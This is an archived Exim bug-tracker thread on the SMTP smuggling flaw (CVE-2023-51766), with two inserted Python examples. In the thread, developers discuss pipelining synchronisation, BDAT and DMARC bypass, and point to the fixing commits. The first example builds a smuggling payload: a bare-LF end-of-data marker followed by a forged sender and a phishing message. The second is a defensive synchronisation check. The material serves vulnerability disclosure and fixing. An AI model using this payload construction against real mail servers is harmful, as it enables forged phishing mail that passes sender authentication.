Mailing List Archive

[Bug 3063] Partially vulnerable to "SMTP Smuggling" if pipelining is enabled and chunking is disabled/unused
https://bugs.exim.org/show_bug.cgi?id=3063

Simon Arlott <bugzilla.exim.simon@arlott.org> changed:

What    | Removed                                   | Added
--------+-------------------------------------------+-------------------------------------------
Summary | Partially vulnerable to "SMTP Smuggling"  | Partially vulnerable to "SMTP Smuggling"
        | if pipelining is enabled and chunking is  | if pipelining is enabled and chunking is
        | disabled                                  | disabled/unused

--
You are receiving this mail because:
You are on the CC list for the bug.

--
## subscription configuration (requires account):
## https://lists.exim.org/mailman3/postorius/lists/exim-dev.lists.exim.org/
## unsubscribe (doesn't require an account):
## exim-dev-unsubscribe@lists.exim.org
## Exim details at http://www.exim.org/
## Please use the Wiki with this list - http://wiki.exim.org/

[Bug 3063] Partially vulnerable to "SMTP Smuggling" if pipelining is enabled and chunking is disabled/unused
https://bugs.exim.org/show_bug.cgi?id=3063

Viktor Dukhovni <viktor1dane@dukhovni.org> changed:

What |Removed |Added
----------------------------------------------------------------------------
CC| |viktor1dane@dukhovni.org

--- Comment #1 from Viktor Dukhovni <viktor1dane@dukhovni.org> ---
Does Exim enforce pipelining conformance by default?

That is, what is the default behaviour of Exim when an SMTP client expedites
some data before receiving a reply to a command (e.g. *DATA*) that should be
the *last* in a pipeline group?

Also, I should note that (as specified in RFC1830) BDAT is NOT the last command
in a pipeline group, and so Exim will accept two messages via a transaction of
the form:

MAIL FROM:<sender>
RCPT TO:<nobody>
DATA
From: Some Sender <sender>
To: Discarded Rcpt <nobody>
Subject: ...

<Some Message>
<LF>.<LF>
MAIL FROM:<forged-sender>
RCPT TO:<real-rcpt>
BDAT <length> LAST
From: Forged Sender <forged-sender>
To: Real Rcpt <real-rcpt>
Subject: Wire all your assets to me

<Phishing attack>
QUIT

It is sadly legal to pipeline any number of messages without any pauses with
BDAT. So provided the upstream system does not support CHUNKING, and treats
non-standard line endings (<LF>.<LF> or <LF>.<CR><LF>) as normal message
content to be sent verbatim, the SMTP smuggling scenario will work with that
system as the sending and Exim as the receiving MTA.

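The transaction described in comment #1, played through a toy sender and receiver as an added example (written for this page; not Exim code and not code from anyone in the thread). The sender does standard dot-stuffing and only knows <CRLF>.<CRLF> as end-of-data, so the bare <LF>.<LF> and everything after it go out verbatim inside the DATA body. A receiver that also accepts <LF>.<LF> as end-of-data then sees a second MAIL/RCPT/BDAT transaction; a receiver that insists on <CRLF>.<CRLF> sees one message addressed to the discarded recipient. Addresses and message text are constructed, and receive() is a deliberately minimal parser.

```python
"""SMTP smuggling via a bare <LF>.<LF> in a DATA body, followed by a BDAT
transaction.  Toy sender/receiver for illustration only; not Exim code."""
import re

# Strict end-of-data per RFC 5321: exactly <CRLF>.<CRLF>.
STRICT_TERM = re.compile(rb"\r\n\.\r\n")
# Lenient: <LF>.<LF>, <LF>.<CRLF>, <CRLF>.<LF> or <CRLF>.<CRLF>.
LENIENT_TERM = re.compile(rb"\r?\n\.\r?\n")

# Chunk carried by the smuggled BDAT (constructed sample).
FORGED_CHUNK = (
    b"From: Forged Sender <ceo@example.com>\r\n"
    b"To: Real Rcpt <victim@example.net>\r\n"
    b"Subject: Wire all your assets to me\r\n"
    b"\r\n"
    b"Phishing attack\r\n"
)

# The single message body as the *sending* MTA sees it.  Everything after
# the bare-LF "dot" is, to that sender, ordinary body text (constructed).
SMUGGLED_BODY = (
    b"From: Some Sender <sender@example.com>\r\n"
    b"To: Discarded Rcpt <nobody@example.net>\r\n"
    b"Subject: cover\r\n"
    b"\r\n"
    b"innocuous text\r\n"
    b"\n.\n"                                  # <LF>.<LF>: the smuggling pivot
    b"MAIL FROM:<ceo@example.com>\r\n"
    b"RCPT TO:<victim@example.net>\r\n"
    + b"BDAT %d LAST\r\n" % len(FORGED_CHUNK)  # explicit length: no pause needed
    + FORGED_CHUNK
    + b"QUIT\r\n"
)


def dot_stuff(body: bytes) -> bytes:
    """Sender side (RFC 5321 4.5.2): stuff a '.' at line start, then append
    <CRLF>.<CRLF>.  Lines are split on CRLF only, so the bare <LF>.<LF> is
    never seen as a line starting with '.' and is sent verbatim."""
    lines = [b"." + ln if ln.startswith(b".") else ln for ln in body.split(b"\r\n")]
    out = b"\r\n".join(lines)
    if not out.endswith(b"\r\n"):
        out += b"\r\n"
    return out + b".\r\n"


def build_wire() -> bytes:
    """Bytes a non-CHUNKING upstream MTA puts on the wire for one message."""
    return (b"MAIL FROM:<sender@example.com>\r\n"
            b"RCPT TO:<nobody@example.net>\r\n"
            b"DATA\r\n" + dot_stuff(SMUGGLED_BODY) + b"QUIT\r\n")


WIRE = build_wire()


def _commit(txn: dict, body: bytes) -> dict:
    return {"mail_from": txn["mail_from"], "rcpt_to": txn["rcpt_to"], "body": body}


def receive(wire: bytes, strict: bool) -> list:
    """Receiver side: parse MAIL/RCPT/DATA/BDAT/QUIT; return accepted messages."""
    term = STRICT_TERM if strict else LENIENT_TERM
    accepted, txn, pos = [], None, 0
    while pos < len(wire):
        eol = wire.find(b"\r\n", pos)
        if eol < 0:
            break
        line, pos = wire[pos:eol], eol + 2
        verb = line.upper()
        if verb.startswith(b"MAIL FROM:"):
            txn = {"mail_from": line[10:].decode(), "rcpt_to": [], "chunks": []}
        elif verb.startswith(b"RCPT TO:") and txn:
            txn["rcpt_to"].append(line[8:].decode())
        elif verb == b"DATA" and txn:
            m = term.search(wire, pos)
            if m is None:
                break                                   # unterminated body
            body = wire[pos:m.start()].replace(b"\r\n..", b"\r\n.")  # un-stuff
            accepted.append(_commit(txn, body))
            txn, pos = None, m.end()
        elif verb.startswith(b"BDAT ") and txn:
            parts = verb.split()
            n = int(parts[1])
            txn["chunks"].append(wire[pos:pos + n])   # no end-of-data search at all
            pos += n
            if parts[-1] == b"LAST":
                accepted.append(_commit(txn, b"".join(txn["chunks"])))
                txn = None
        elif verb == b"QUIT":
            break
    return accepted


if __name__ == "__main__":
    for mode in (True, False):
        msgs = receive(WIRE, strict=mode)
        print(f"strict={mode}: {len(msgs)} message(s) accepted")
        for msg in msgs:
            print("  ", msg["mail_from"], "->", msg["rcpt_to"])
```

With strict=True the receiver accepts one message to nobody@example.net whose body still contains the MAIL/RCPT/BDAT text; with strict=False it accepts two, the second with the forged envelope sender and the real recipient. Note that the BDAT chunk is consumed purely by its declared length, so the receiver never looks for an end-of-data marker or a pause on the smuggled message, which is the point made above about BDAT not being the last command in a pipeline group.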
[Bug 3063] Partially vulnerable to "SMTP Smuggling" if pipelining is enabled and chunking is disabled/unused
https://bugs.exim.org/show_bug.cgi?id=3063

--- Comment #2 from Jeremy Harris <jgh146exb@wizmail.org> ---
(In reply to Viktor Dukhovni from comment #1)
> Does Exim enforce pipelining conformance by default?

In general yes, but specifically for the 354 "DATA go-ahead", not
by default. It's possible to induce one.

I could see some value in a change to always enforce.

> That is, what is the default behaviour of Exim when an SMTP client expedites

> Also, I should note that (as specified in RFC1830) BDAT is NOT the last
> command in a pipeline group, and so Exim will accept two messages via a
> transaction of the form:
>
> MAIL FROM:<sender>
> RCPT TO:<nobody>
> DATA

Um, that was DATA and not BDAT.

> From: Some Sender <sender>
> To: Discarded Rcpt <nobody>
> Subject: ...
>
> <Some Message>
> <LF>.<LF>

and IF that gets treated as the dot closing off data, such that the
following are taken as commands for a further message:

> MAIL FROM:<forged-sender>
> RCPT TO:<real-rcpt>
> BDAT <length> LAST
> From: Forged Sender <forged-sender>
> To: Real Rcpt <real-rcpt>
> Subject: Wire all your assets to me
>
> <Phishing attack>
> QUIT

... that "phishing attack" could just as easily have been sent
as a sole message. It will still be subject to all the same
Access Control List operations, either way.

[Bug 3063] Partially vulnerable to "SMTP Smuggling" if pipelining is enabled and chunking is disabled/unused
https://bugs.exim.org/show_bug.cgi?id=3063

--- Comment #3 from Viktor Dukhovni <viktor1dane@dukhovni.org> ---

(In reply to Jeremy Harris from comment #2)
> (In reply to Viktor Dukhovni from comment #1)
> > Does Exim enforce pipelining conformance by default?
>
> In general yes, but specifically for the 354 "DATA go-ahead", not
> by default. It's possible to induce one.
>
> I could see some value in a change to always enforce.

That would likely be prudent.


> > Also, I should note that (as specified in RFC1830) BDAT is NOT the last
> > command in a pipeline group, and so Exim will accept two messages via a
> > transaction of the form:
> >
> > MAIL FROM:<sender>
> > RCPT TO:<nobody>
> > DATA
>
> Um, that was DATA and not BDAT.

That's DELIBERATE. The BDAT in question is in the BODY of the upstream message
(below), preceded by <LF>.<LF>. We need DATA from the upstream system to make
some variant of <CRLF>.<CRLF> be end-of-message, but then its SMTP smuggling
payload can use BDAT to bypass any pipelining enforcement.

>
> > From: Some Sender <sender>
> > To: Discarded Rcpt <nobody>
> > Subject: ...
> >
> > <Some Message>
> > <LF>.<LF>
>
> and IF that gets treated as the dot closing off data, such that the
> following are taken as commands for a further message:
>
> > MAIL FROM:<forged-sender>
> > RCPT TO:<real-rcpt>
> > BDAT <length> LAST
> > From: Forged Sender <forged-sender>
> > To: Real Rcpt <real-rcpt>
> > Subject: Wire all your assets to me
> >
> > <Phishing attack>
> > QUIT
>
> ... that "phishing attack" could just as easily have been sent
> as a sole message. It will still be subject to all the same
> Access Control List operations, either way.

But the scenario in question assumes that the victim of forgery has DMARC, and
that the sending system would normally restrict the alleged "From:" address (as
is the typical case for submission via public email providers, hosting many
customer domains, including perhaps their own).

In this attack scenario, the sending system is unaware that there's a second
message in the body of the first, and the alignment of "From:" with the sender
credentials is not enforced, but SPF-based DMARC checks still pass...

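The synchronisation check discussed in comments #2 and #3, as an added example (a toy receiver written for this page, not Exim code). RFC 2920 requires that EHLO, DATA, VRFY, EXPN, TURN, QUIT and NOOP be the last command in a pipelined group, so a receiver that finds more bytes already buffered behind such a command knows the client did not wait for the reply and can refuse with a 554 instead of guessing where the message body starts. BDAT (RFC 3030) carries an explicit byte count and may legally be followed by its chunk in the same burst, which is why a BDAT-based payload is not caught by that check. Bursts, addresses and reply texts are constructed.

```python
"""Toy SMTP receiver with a pipelining synchronisation check.  feed() is
called once per burst, i.e. once per read() that returns whatever the
client had already sent without waiting for replies.  Not Exim code."""

# RFC 2920 section 3.1: commands that must be the last in a pipelined group.
SYNC_POINTS = {b"EHLO", b"HELO", b"DATA", b"VRFY", b"EXPN", b"TURN", b"QUIT", b"NOOP"}
END_OF_DATA = b"\r\n.\r\n"
SYNC_ERROR = b"554 SMTP synchronization error"
ACCEPTED = b"250 OK message accepted"


class Receiver:
    def __init__(self, enforce_sync: bool):
        self.enforce_sync = enforce_sync
        self.state = "cmd"          # "cmd", "data" or "closed"
        self.body = b""
        self.replies = []
        self.accepted = []          # bodies of messages accepted so far

    def _accept(self) -> bytes:
        self.accepted.append(self.body)
        self.body = b""
        return ACCEPTED

    def feed(self, burst: bytes) -> list:
        """Process one burst of client input; return the replies it produced."""
        buf, out = burst, []
        while buf and self.state != "closed":
            if self.state == "data":
                end = buf.find(END_OF_DATA)
                if end < 0:                       # terminator not yet seen
                    self.body, buf = self.body + buf, b""
                    continue
                self.body += buf[:end]
                buf = buf[end + len(END_OF_DATA):]
                self.state = "cmd"
                out.append(self._accept())
                continue
            eol = buf.find(b"\r\n")
            if eol < 0:                           # partial line: wait for more
                break
            line, buf = buf[:eol], buf[eol + 2:]
            verb = line.split(b" ", 1)[0].upper()
            if self.enforce_sync and verb in SYNC_POINTS and buf:
                # Bytes already queued behind a command that must end the
                # group: the client did not wait for our reply.  Refuse
                # rather than guess what those bytes are.
                out.append(SYNC_ERROR)
                self.state = "closed"
                break
            if verb == b"DATA":
                out.append(b'354 Enter message, ending with "." on a line by itself')
                self.state = "data"
            elif verb == b"BDAT":
                # RFC 3030: BDAT is not a sync point; the chunk may follow it
                # in the same burst and its length is explicit.
                args = line.split()[1:]
                n = int(args[0])
                self.body, buf = self.body + buf[:n], buf[n:]
                last = any(a.upper() == b"LAST" for a in args[1:])
                out.append(self._accept() if last else b"250 chunk received")
            elif verb == b"QUIT":
                out.append(b"221 closing connection")
                self.state = "closed"
            else:
                out.append(b"250 OK")
        self.replies.extend(out)
        return out


def run(bursts, enforce_sync: bool) -> Receiver:
    r = Receiver(enforce_sync)
    for burst in bursts:
        r.feed(burst)
    return r


# Constructed client behaviours; one list element = one burst on the wire.
COMPLIANT = [   # pipelines MAIL/RCPT/DATA, then waits for 354 before the body
    b"MAIL FROM:<a@example.com>\r\nRCPT TO:<b@example.net>\r\nDATA\r\n",
    b"Subject: hi\r\n\r\nbody\r\n.\r\n",
    b"QUIT\r\n",
]
EAGER = [       # sends the body and QUIT without waiting for 354
    b"MAIL FROM:<a@example.com>\r\nRCPT TO:<b@example.net>\r\nDATA\r\n"
    b"Subject: hi\r\n\r\nbody\r\n.\r\nQUIT\r\n",
]
CHUNKED = [     # BDAT with its 6-byte chunk in the same burst: legal, no sync error
    b"MAIL FROM:<a@example.com>\r\nRCPT TO:<b@example.net>\r\n"
    b"BDAT 6 LAST\r\nbody\r\nQUIT\r\n",
]

if __name__ == "__main__":
    for name, bursts in (("compliant", COMPLIANT), ("eager", EAGER), ("chunked", CHUNKED)):
        for enforce in (True, False):
            r = run(bursts, enforce)
            print(f"{name:9s} enforce_sync={enforce!s:5s} -> {r.replies[-1].decode()}")
```

With enforce_sync=True the eager client gets the 554 and nothing is accepted, while the compliant client and the CHUNKING client both get their message through; with enforce_sync=False the eager client's early body is silently accepted, which is the behaviour that lets a smuggled payload land. Exim's corresponding main option is smtp_enforce_sync.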
[Bug 3063] Partially vulnerable to "SMTP Smuggling" if pipelining is enabled and chunking is disabled/unused
https://bugs.exim.org/show_bug.cgi?id=3063

Jeremy Harris <jgh146exb@wizmail.org> changed:

What |Removed |Added
----------------------------------------------------------------------------
Status|NEW |ASSIGNED
OS|Linux |All
Assignee|unallocated@exim.org |jgh146exb@wizmail.org
Hardware|x86 |All
Target Milestone|Exim 4.97 |Exim 4.98

[Bug 3063] Partially vulnerable to "SMTP Smuggling" if pipelining is enabled and chunking is disabled/unused
https://bugs.exim.org/show_bug.cgi?id=3063

--- Comment #4 from Jeremy Harris <jgh146exb@wizmail.org> ---
https://nvd.nist.gov/vuln/detail/CVE-2023-51766

git master: cf1376206284 & 5bb786d5ad56 address this.
5bb7 has a dependency on 4596719398f6 (which is only coding-style changes;
not strictly part of the fixes).

Interested parties capable of building from git are invited to do so;
these commits are not in a release package from the Exim project at this time.

[Bug 3063] Partially vulnerable to "SMTP Smuggling" if pipelining is enabled and chunking is disabled/unused
https://bugs.exim.org/show_bug.cgi?id=3063

--- Comment #5 from Jeremy Harris <jgh146exb@wizmail.org> ---
I was wrong about the lack of synch check for DATA. There has always
been one, so the one added in cf1376 is not needed (but will do no harm).
